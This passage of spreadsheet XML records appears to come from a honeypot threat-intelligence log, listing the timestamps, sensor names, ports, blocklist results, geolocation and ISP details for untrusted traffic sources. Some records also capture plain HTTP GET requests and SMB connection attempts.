    <s v="TOTAL PLAY TELECOMUNICACIONES SA DE CV"/>
    <s v="Total Play Telecomunicaciones SA De CV"/>
    <s v="business"/>
    <s v="Total Play Telecomunicaciones SA De CV"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bbbd:7859"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1534"/>
    <x v="1534"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:37:34"/>
    <d v="2025-04-16T06:37:34"/>
    <d v="2025-04-16T06:37:34"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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dd:7bf0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1535"/>
    <x v="1535"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:16:21"/>
    <d v="2025-03-31T20:49:11"/>
    <d v="2025-04-16T06:16:21"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:f7d4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1536"/>
    <x v="1536"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:15:52"/>
    <d v="2025-04-16T06:15:52"/>
    <d v="2025-04-16T06:15:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Thrissur"/>
    <s v="Thrissur"/>
    <s v="1254187"/>
    <s v="680001"/>
    <s v="10.5276"/>
    <s v="76.2144"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75dd:9e5d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1537"/>
    <x v="1537"/>
    <s v="220-134-92-45.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:12:43"/>
    <d v="2024-09-05T14:13:00"/>
    <d v="2025-04-16T06:12:43"/>
    <n v="436"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;6519&amp;&amp;60579&amp;&amp;80&amp;&amp;9100&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:5c2d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1538"/>
    <x v="1538"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:11:56"/>
    <d v="2024-11-23T09:17:33"/>
    <d v="2025-04-16T06:11:56"/>
    <n v="84"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H10"/>
    <s v="1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="55313"/>
    <s v="Hanel Communication JSC"/>
    <s v="HANELCOM"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,59971)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,60006)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,52002)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,52033)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,57628)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,57881)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,55172)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,55230)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,51129)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,51154)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,60687)}&amp;&amp;{Data_SMB:Incoming connection (27.118.25.248,60763)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b76:19f8"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1539"/>
    <x v="1539"/>
    <s v="220-132-237-245.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:11:46"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-16T06:11:46"/>
    <n v="324"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H47&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;63644&amp;&amp;20139&amp;&amp;23&amp;&amp;80&amp;&amp;9100&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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:edf5"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1540"/>
    <x v="1540"/>
    <s v="114-32-67-177.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:11:21"/>
    <d v="2024-08-26T23:16:01"/>
    <d v="2025-04-16T06:11:21"/>
    <n v="203"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;18681&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;46879"/>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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7220:43b1"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1541"/>
    <x v="1541"/>
    <s v="host-77-242-130-19.mywic.eu&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:11:03"/>
    <d v="2025-02-23T23:57:43"/>
    <d v="2025-04-16T06:11:03"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="20121"/>
    <s v="45.4642"/>
    <s v="9.18998"/>
    <s v="44092"/>
    <s v="HAL Service SpA"/>
    <s v="HAL Service SpA"/>
    <s v="business"/>
    <s v="Mywic Costumers"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4df2:8213"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1542"/>
    <x v="1542"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:10:48"/>
    <d v="2024-12-24T02:02:35"/>
    <d v="2025-04-16T06:10:48"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuse.ch"/>
    <s v="23&amp;&amp;NA&amp;&amp;50833"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Ubatuba"/>
    <s v="Ubatuba"/>
    <s v="3445847"/>
    <s v="NA"/>
    <s v="-23.4339"/>
    <s v="-45.0711"/>
    <s v="268645"/>
    <s v="FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="business"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da4:b106"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1543"/>
    <x v="1543"/>
    <s v="125-228-88-11.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:10:30"/>
    <d v="2023-11-24T13:55:10"/>
    <d v="2025-04-16T06:10:30"/>
    <n v="706"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;27268&amp;&amp;80&amp;&amp;23&amp;&amp;9100&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:580b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1544"/>
    <x v="1544"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T06:10:13"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-16T06:10:13"/>
    <n v="570"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;45173&amp;&amp;45420"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="NG"/>
    <s v="Nigeria"/>
    <s v="AK"/>
    <s v="Akwa Ibom State"/>
    <s v="Uyo"/>
    <s v="Uyo"/>
    <s v="2319480"/>
    <s v="NA"/>
    <s v="5.05127"/>
    <s v="7.9335"/>
    <s v="329244"/>
    <s v="Connect, Surf and Smile Limited"/>
    <s v="Connect, Surf and Smile Limited"/>
    <s v="business"/>
    <s v="Connect, Surf and Smile Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:66d4:2877"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1545"/>
    <x v="1545"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T05:20:17"/>
    <d v="2025-04-16T05:16:36"/>
    <d v="2025-04-16T05:20:17"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="33"/>
    <s v="Đắk Lắk"/>
    <s v="Thành Phố Buôn Ma Thuột"/>
    <s v="Buon Ma Thuot"/>
    <s v="1586896"/>
    <s v="NA"/>
    <s v="12.6675"/>
    <s v="108.038"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="FPTDYNAMICIP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2a77:652f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1546"/>
    <x v="1546"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T05:13:29"/>
    <d v="2025-04-16T05:04:07"/>
    <d v="2025-04-16T05:13:29"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai (Satya Nagar)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.101"/>
    <s v="72.888"/>
    <s v="134274"/>
    <s v="Rnet Gigafiber Pvt Ltd"/>
    <s v="Rnet Gigafiber Pvt Ltd"/>
    <s v="residential"/>
    <s v="Rnet Gigafiber Pvt Ltd"/>
